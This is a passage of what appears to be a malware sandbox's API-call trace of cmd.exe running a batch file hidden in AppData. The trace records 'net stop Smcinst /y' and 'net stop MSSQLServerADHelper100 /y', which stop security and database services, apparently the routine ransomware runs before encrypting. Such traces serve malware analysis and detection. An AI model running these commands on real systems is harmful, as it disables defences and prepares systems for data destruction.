lpSize=0x3beb00 | out: lpAttributeList=0x3bea38, lpSize=0x3beb00) returned 1 [0044.404] UpdateProcThreadAttribute (in: lpAttributeList=0x3bea38, dwFlags=0x0, Attribute=0x60001, lpValue=0x3beaf8, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x3bea38, lpPreviousValue=0x0) returned 1 [0044.404] GetStartupInfoW (in: lpStartupInfo=0x3be9f4 | out: lpStartupInfo=0x3be9f4*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x100, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x264, hStdError=0x26c)) [0044.404] lstrcmpW (lpString1="\\net.exe", lpString2="\\XCOPY.EXE") returned -1 [0044.405] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\net.exe", lpCommandLine="net stop Smcinst /y", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpStartupInfo=0x3bea94*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="net stop Smcinst /y", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x3beae0 | out: lpCommandLine="net stop Smcinst /y", lpProcessInformation=0x3beae0*(hProcess=0x78, hThread=0x74, dwProcessId=0x8b8, dwThreadId=0x858)) returned 1 [0044.410] CloseHandle (hObject=0x74) returned 1 [0044.411] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0044.411] GetProcessHeap () returned 0x3e0000 [0044.411] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f8f70 | out: hHeap=0x3e0000) returned 1 [0044.411] GetEnvironmentStringsW () returned 0x3f8408* [0044.411] GetProcessHeap () returned 0x3e0000 [0044.411] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xb5c) returned 0x3f8f70 [0044.411] FreeEnvironmentStringsW (penv=0x3f8408) returned 1 [0044.411] WaitForSingleObject (hHandle=0x78, dwMilliseconds=0xffffffff) returned 0x0 [0044.770] GetExitCodeProcess (in: hProcess=0x78, lpExitCode=0x3be9d4 | out: lpExitCode=0x3be9d4*=0x2) returned 1 [0044.770] CloseHandle (hObject=0x78) returned 1 [0044.771] _vsnwprintf (in: _Buffer=0x3beb1c, _BufferCount=0x13, _Format="%08X", _ArgList=0x3be9e0 | out: _Buffer="00000002") returned 8 [0044.771] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000002") returned 1 [0044.771] GetProcessHeap () returned 0x3e0000 [0044.771] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f8f70 | out: hHeap=0x3e0000) returned 1 [0044.771] GetEnvironmentStringsW () returned 0x3f8408* [0044.771] GetProcessHeap () returned 0x3e0000 [0044.771] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xb5c) returned 0x3f8f70 [0044.771] FreeEnvironmentStringsW (penv=0x3f8408) returned 1 [0044.771] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0044.771] GetProcessHeap () returned 0x3e0000 [0044.771] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f8f70 | out: hHeap=0x3e0000) returned 1 [0044.771] GetEnvironmentStringsW () returned 0x3f8408* [0044.771] GetProcessHeap () returned 0x3e0000 [0044.771] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xb5c) returned 0x3f8f70 [0044.771] FreeEnvironmentStringsW (penv=0x3f8408) returned 1 [0044.771] GetProcessHeap () returned 0x3e0000 [0044.771] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6a70 | out: hHeap=0x3e0000) returned 1 [0044.771] DeleteProcThreadAttributeList (in: lpAttributeList=0x3bea38 | out: lpAttributeList=0x3bea38) [0044.771] _get_osfhandle (_FileHandle=1) returned 0x264 [0044.771] SetConsoleMode (hConsoleHandle=0x264, dwMode=0x0) returned 0 [0044.771] _get_osfhandle (_FileHandle=1) returned 0x264 [0044.771] GetConsoleMode (in: hConsoleHandle=0x264, lpMode=0x4a9841ac | out: lpMode=0x4a9841ac) returned 0 [0044.771] _get_osfhandle (_FileHandle=0) returned 0xfffffffe [0044.771] GetConsoleMode (in: hConsoleHandle=0xfffffffe, lpMode=0x4a9841b0 | out: lpMode=0x4a9841b0) returned 1 [0044.772] _get_osfhandle (_FileHandle=0) returned 0xfffffffe [0044.772] SetConsoleMode (hConsoleHandle=0xfffffffe, dwMode=0x7) returned 0 [0044.772] SetConsoleInputExeNameW () returned 0x1 [0044.772] GetConsoleOutputCP () returned 0x1b5 [0044.772] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a984260 | out: lpCPInfo=0x4a984260) returned 1 [0044.772] SetThreadUILanguage (LangId=0x0) returned 0x409 [0044.772] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\{7BC215DC-ADE3-41CE-9940-63296E9C3DD5}\\c48c75d7__.bat" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\{7bc215dc-ade3-41ce-9940-63296e9c3dd5}\\c48c75d7__.bat"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x3bf254, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x78 [0044.772] _open_osfhandle (_OSFileHandle=0x78, _Flags=8) returned 3 [0044.773] _get_osfhandle (_FileHandle=3) returned 0x78 [0044.773] SetFilePointer (in: hFile=0x78, lDistanceToMove=1846, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x736 [0044.773] GetProcessHeap () returned 0x3e0000 [0044.773] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f7148 | out: hHeap=0x3e0000) returned 1 [0044.773] GetProcessHeap () returned 0x3e0000 [0044.773] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f7018 | out: hHeap=0x3e0000) returned 1 [0044.773] GetProcessHeap () returned 0x3e0000 [0044.773] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6ef0 | out: hHeap=0x3e0000) returned 1 [0044.773] GetProcessHeap () returned 0x3e0000 [0044.773] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6e88 | out: hHeap=0x3e0000) returned 1 [0044.773] GetProcessHeap () returned 0x3e0000 [0044.773] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f8278 | out: hHeap=0x3e0000) returned 1 [0044.773] GetProcessHeap () returned 0x3e0000 [0044.773] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f4ba8 | out: hHeap=0x3e0000) returned 1 [0044.773] GetProcessHeap () returned 0x3e0000 [0044.773] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f81f8 | out: hHeap=0x3e0000) returned 1 [0044.773] GetProcessHeap () returned 0x3e0000 [0044.773] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6d58 | out: hHeap=0x3e0000) returned 1 [0044.773] GetProcessHeap () returned 0x3e0000 [0044.773] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f4a80 | out: hHeap=0x3e0000) returned 1 [0044.773] GetProcessHeap () returned 0x3e0000 [0044.773] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6cf0 | out: hHeap=0x3e0000) returned 1 [0044.773] GetProcessHeap () returned 0x3e0000 [0044.773] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3e1290 | out: hHeap=0x3e0000) returned 1 [0044.773] GetProcessHeap () returned 0x3e0000 [0044.773] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6a58 | out: hHeap=0x3e0000) returned 1 [0044.773] GetProcessHeap () returned 0x3e0000 [0044.773] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f3f90 | out: hHeap=0x3e0000) returned 1 [0044.773] _get_osfhandle (_FileHandle=3) returned 0x78 [0044.773] SetFilePointer (in: hFile=0x78, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x736 [0044.773] ReadFile (in: hFile=0x78, lpBuffer=0x4a986640, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x3bf238, lpOverlapped=0x0 | out: lpBuffer=0x4a986640*, lpNumberOfBytesRead=0x3bf238*=0x118b, lpOverlapped=0x0) returned 1 [0044.773] SetFilePointer (in: hFile=0x78, lDistanceToMove=1882, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x75a [0044.774] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4a986640, cbMultiByte=36, lpWideCharStr=0x4a98c640, cchWideChar=8191 | out: lpWideCharStr="net stop MSSQLServerADHelper100 /y\r\n /y\r\ny\r\nΓÇ¥ /y\r\nlures\r\nnded\r\n") returned 36 [0044.774] _get_osfhandle (_FileHandle=3) returned 0x78 [0044.774] GetFileType (hFile=0x78) returned 0x1 [0044.774] _get_osfhandle (_FileHandle=3) returned 0x78 [0044.774] SetFilePointer (in: hFile=0x78, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x75a [0044.774] GetProcessHeap () returned 0x3e0000 [0044.774] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x400a) returned 0x3fdad8 [0044.774] GetProcessHeap () returned 0x3e0000 [0044.774] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3fdad8 | out: hHeap=0x3e0000) returned 1 [0044.774] _tell (_FileHandle=3) returned 1882 [0044.774] _close (_FileHandle=3) returned 0 [0044.775] _wcsicmp (_String1="net", _String2="DIR") returned 10 [0044.775] _wcsicmp (_String1="net", _String2="ERASE") returned 9 [0044.775] _wcsicmp (_String1="net", _String2="DEL") returned 10 [0044.775] _wcsicmp (_String1="net", _String2="TYPE") returned -6 [0044.775] _wcsicmp (_String1="net", _String2="COPY") returned 11 [0044.775] _wcsicmp (_String1="net", _String2="CD") returned 11 [0044.775] _wcsicmp (_String1="net", _String2="CHDIR") returned 11 [0044.775] _wcsicmp (_String1="net", _String2="RENAME") returned -4 [0044.775] _wcsicmp (_String1="net", _String2="REN") returned -4 [0044.775] _wcsicmp (_String1="net", _String2="ECHO") returned 9 [0044.775] _wcsicmp (_String1="net", _String2="SET") returned -5 [0044.775] _wcsicmp (_String1="net", _String2="PAUSE") returned -2 [0044.775] _wcsicmp (_String1="net", _String2="DATE") returned 10 [0044.775] _wcsicmp (_String1="net", _String2="TIME") returned -6 [0044.775] _wcsicmp (_String1="net", _String2="PROMPT") returned -2 [0044.775] _wcsicmp (_String1="net", _String2="MD") returned 1 [0044.775] _wcsicmp (_String1="net", _String2="MKDIR") returned 1 [0044.775] _wcsicmp (_String1="net", _String2="RD") returned -4 [0044.775] _wcsicmp (_String1="net", _String2="RMDIR") returned -4 [0044.775] _wcsicmp (_String1="net", _String2="PATH") returned -2 [0044.775] _wcsicmp (_String1="net", _String2="GOTO") returned 7 [0044.775] _wcsicmp (_String1="net", _String2="SHIFT") returned -5 [0044.775] _wcsicmp (_String1="net", _String2="CLS") returned 11 [0044.775] _wcsicmp (_String1="net", _String2="CALL") returned 11 [0044.775] _wcsicmp (_String1="net", _String2="VERIFY") returned -8 [0044.775] _wcsicmp (_String1="net", _String2="VER") returned -8 [0044.775] _wcsicmp (_String1="net", _String2="VOL") returned -8 [0044.775] _wcsicmp (_String1="net", _String2="EXIT") returned 9 [0044.775] _wcsicmp (_String1="net", _String2="SETLOCAL") returned -5 [0044.775] _wcsicmp (_String1="net", _String2="ENDLOCAL") returned 9 [0044.775] _wcsicmp (_String1="net", _String2="TITLE") returned -6 [0044.775] _wcsicmp (_String1="net", _String2="START") returned -5 [0044.775] _wcsicmp (_String1="net", _String2="DPATH") returned 10 [0044.775] _wcsicmp (_String1="net", _String2="KEYS") returned 3 [0044.775] _wcsicmp (_String1="net", _String2="MOVE") returned 1 [0044.775] _wcsicmp (_String1="net", _String2="PUSHD") returned -2 [0044.775] _wcsicmp (_String1="net", _String2="POPD") returned -2 [0044.776] _wcsicmp (_String1="net", _String2="ASSOC") returned 13 [0044.776] _wcsicmp (_String1="net", _String2="FTYPE") returned 8 [0044.776] _wcsicmp (_String1="net", _String2="BREAK") returned 12 [0044.776] _wcsicmp (_String1="net", _String2="COLOR") returned 11 [0044.776] _wcsicmp (_String1="net", _String2="MKLINK") returned 1 [0044.776] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x3f6cf8, lpFilePart=0x3bf050 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x3bf050*="Desktop") returned 0x25 [0044.776] SetErrorMode (uMode=0x0) returned 0x1 [0044.776] GetProcessHeap () returned 0x3e0000 [0044.776] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f6cf0, Size=0x5c) returned 0x3f6cf0 [0044.776] GetProcessHeap () returned 0x3e0000 [0044.776] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f6cf0) returned 0x5c [0044.776] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0044.776] GetProcessHeap () returned 0x3e0000 [0044.776] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x120) returned 0x3f4a80 [0044.776] GetProcessHeap () returned 0x3e0000 [0044.776] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x238) returned 0x3f6d58 [0044.776] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f6d58, Size=0x122) returned 0x3f6d58 [0044.776] GetProcessHeap () returned 0x3e0000 [0044.776] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f6d58) returned 0x122 [0044.776] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a990640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0044.776] GetProcessHeap () returned 0x3e0000 [0044.776] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xe0) returned 0x3f81f8 [0044.776] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f81f8, Size=0x76) returned 0x3f81f8 [0044.776] GetProcessHeap () returned 0x3e0000 [0044.776] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f81f8) returned 0x76 [0044.776] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0044.776] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\net.*", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0xffffffff [0044.777] GetLastError () returned 0x2 [0044.777] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\net", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0xffffffff [0044.777] GetLastError () returned 0x2 [0044.777] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0044.777] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.*", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0x3f8278 [0044.777] FindClose (in: hFindFile=0x3f8278 | out: hFindFile=0x3f8278) returned 1 [0044.777] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.COM", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0xffffffff [0044.777] GetLastError () returned 0x2 [0044.777] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.EXE", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0x3f8278 [0044.777] FindClose (in: hFindFile=0x3f8278 | out: hFindFile=0x3f8278) returned 1 [0044.777] GetConsoleTitleW (in: lpConsoleTitle=0x3bee1c, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0044.778] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x3f6e90, lpFilePart=0x3be93c | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x3be93c*="Desktop") returned 0x25 [0044.778] SetErrorMode (uMode=0x0) returned 0x1 [0044.778] GetProcessHeap () returned 0x3e0000 [0044.778] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f6e88, Size=0x5c) returned 0x3f6e88 [0044.778] GetProcessHeap () returned 0x3e0000 [0044.778] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f6e88) returned 0x5c [0044.778] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0044.778] GetProcessHeap () returned 0x3e0000 [0044.778] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x120) returned 0x3f6ef0 [0044.778] GetProcessHeap () returned 0x3e0000 [0044.778] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x238) returned 0x3f7018 [0044.778] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f7018, Size=0x122) returned 0x3f7018 [0044.778] GetProcessHeap () returned 0x3e0000 [0044.778] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f7018) returned 0x122 [0044.778] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a990640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0044.778] GetProcessHeap () returned 0x3e0000 [0044.778] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xe0) returned 0x3f7148 [0044.778] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f7148, Size=0x76) returned 0x3f7148 [0044.778] GetProcessHeap () returned 0x3e0000 [0044.778] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f7148) returned 0x76 [0044.778] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0044.778] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\net.*", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0xffffffff [0044.778] GetLastError () returned 0x2 [0044.778] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\net", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0xffffffff [0044.779] GetLastError () returned 0x2 [0044.779] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0044.779] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.*", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0x3f71c8 [0044.779] FindClose (in: hFindFile=0x3f71c8 | out: hFindFile=0x3f71c8) returned 1 [0044.779] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.COM", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0xffffffff [0044.779] GetLastError () returned 0x2 [0044.779] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.EXE", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0x3f71c8 [0044.779] FindClose (in: hFindFile=0x3f71c8 | out: hFindFile=0x3f71c8) returned 1 [0044.779] GetConsoleTitleW (in: lpConsoleTitle=0x3bebb0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0044.779] InitializeProcThreadAttributeList (in: lpAttributeList=0x3bea38, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x3beb00 | out: lpAttributeList=0x3bea38, lpSize=0x3beb00) returned 1 [0044.779] UpdateProcThreadAttribute (in: lpAttributeList=0x3bea38, dwFlags=0x0, Attribute=0x60001, lpValue=0x3beaf8, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x3bea38, lpPreviousValue=0x0) returned 1 [0044.779] GetStartupInfoW (in: lpStartupInfo=0x3be9f4 | out: lpStartupInfo=0x3be9f4*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x100, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x264, hStdError=0x26c)) [0044.779] lstrcmpW (lpString1="\\net.exe", lpString2="\\XCOPY.EXE") returned -1 [0044.780] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\net.exe", lpCommandLine="net stop MSSQLServerADHelper100 /y", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpStartupInfo=0x3bea94*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="net stop MSSQLServerADHelper100 /y", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x3beae0 | out: lpCommandLine="net stop MSSQLServerADHelper100 /y", lpProcessInformation=0x3beae0*(hProcess=0x74, hThread=0x78, dwProcessId=0x84c, dwThreadId=0x848)) returned 1 [0044.783] CloseHandle (hObject=0x78) returned 1 [0044.783] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0044.783] GetProcessHeap () returned 0x3e0000 [0044.783] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f8f70 | out: hHeap=0x3e0000) returned 1 [0044.784] GetEnvironmentStringsW () returned 0x3f8408* [0044.784] GetProcessHeap () returned 0x3e0000 [0044.784] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xb5c) returned 0x3f8f70 [0044.784] FreeEnvironmentStringsW (penv=0x3f8408) returned 1 [0044.784] WaitForSingleObject (hHandle=0x74, dwMilliseconds=0xffffffff) returned 0x0 [0045.126] GetExitCodeProcess (in: hProcess=0x74, lpExitCode=0x3be9d4 | out: lpExitCode=0x3be9d4*=0x2) returned 1 [0045.126] CloseHandle (hObject=0x74) returned 1 [0045.127] _vsnwprintf (in: _Buffer=0x3beb1c, _BufferCount=0x13, _Format="%08X", _ArgList=0x3be9e0 | out: _Buffer="00000002") returned 8 [0045.127] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000002") returned 1 [0045.127] GetProcessHeap () returned 0x3e0000 [0045.127] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f8f70 | out: hHeap=0x3e0000) returned 1 [0045.127] GetEnvironmentStringsW () returned 0x3f8408* [0045.127] GetProcessHeap () returned 0x3e0000 [0045.127] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xb5c) returned 0x3f8f70 [0045.127] FreeEnvironmentStringsW (penv=0x3f8408) returned 1 [0045.127] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0045.127] GetProcessHeap () returned 0x3e0000 [0045.127] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f8f70 | out: hHeap=0x3e0000) returned 1 [0045.127] GetEnvironmentStringsW () returned 0x3f8408* [0045.127] GetProcessHeap () returned 0x3e0000 [0045.127] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xb5c) returned 0x3f8f70 [0045.127] FreeEnvironmentStringsW (penv=0x3f8408) returned 1 [0045.127] GetProcessHeap () returned 0x3e0000 [0045.127] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6a70 | out: hHeap=0x3e0000) returned 1 [0045.127] DeleteProcThreadAttributeList (in: lpAttributeList=0x3bea38 | out: lpAttributeList=0x3bea38) [0045.127] _get_osfhandle (_FileHandle=1) returned 0x264 [0045.127] SetConsoleMode (hConsoleHandle=0x264, dwMode=0x0) returned 0 [0045.127] _get_osfhandle (_FileHandle=1) returned 0x264 [0045.127] GetConsoleMode (in: hConsoleHandle=0x264, lpMode=0x4a9841ac | out: lpMode=0x4a9841ac) returned 0 [0045.127] _get_osfhandle (_FileHandle=0) returned 0xfffffffe [0045.127] GetConsoleMode (in: hConsoleHandle=0xfffffffe, lpMode=0x4a9841b0 | out: lpMode=0x4a9841b0) returned 1 [0045.128] _get_osfhandle (_FileHandle=0) returned 0xfffffffe [0045.128] SetConsoleMode (hConsoleHandle=0xfffffffe, dwMode=0x7) returned 0 [0045.128] SetConsoleInputExeNameW () returned 0x1 [0045.128] GetConsoleOutputCP () returned 0x1b5 [0045.128] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a984260 | out: lpCPInfo=0x4a984260) returned 1 [0045.128] SetThreadUILanguage (LangId=0x0) returned 0x409 [0045.128] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\{7BC215DC-ADE3-41CE-9940-63296E9C3DD5}\\c48c75d7__.bat" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\{7bc215dc-ade3-41ce-9940-63296e9c3dd5}\\c48c75d7__.bat"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x3bf254, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x74 [0045.129] _open_osfhandle (_OSFileHandle=0x74, _Flags=8) returned 3 [0045.129] _get_osfhandle (_FileHandle=3) returned 0x74 [0045.129] SetFilePointer (in: hFile=0x74, lDistanceToMove=1882, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x75a [0045.129] GetProcessHeap () returned 0x3e0000 [0045.129] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f7148 | out: hHeap=0x3e0000) returned 1 [0045.129] GetProcessHeap () returned 0x3e0000 [0045.129] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f7018 | out: hHeap=0x3e0000) returned 1 [0045.129] GetProcessHeap () returned 0x3e0000 [0045.129] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6ef0 | out: hHeap=0x3e0000) returned 1 [0045.129] GetProcessHeap () returned 0x3e0000 [0045.129] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6e88 | out: hHeap=0x3e0000) returned 1 [0045.129] GetProcessHeap () returned 0x3e0000 [0045.129] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f8278 | out: hHeap=0x3e0000) returned 1 [0045.129] GetProcessHeap () returned 0x3e0000 [0045.129] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f4ba8 | out: hHeap=0x3e0000) returned 1 [0045.129] GetProcessHeap () returned 0x3e0000 [0045.129] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f81f8 | out: hHeap=0x3e0000) returned 1 [0045.129] GetProcessHeap () returned 0x3e0000 [0045.129] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6d58 | out: 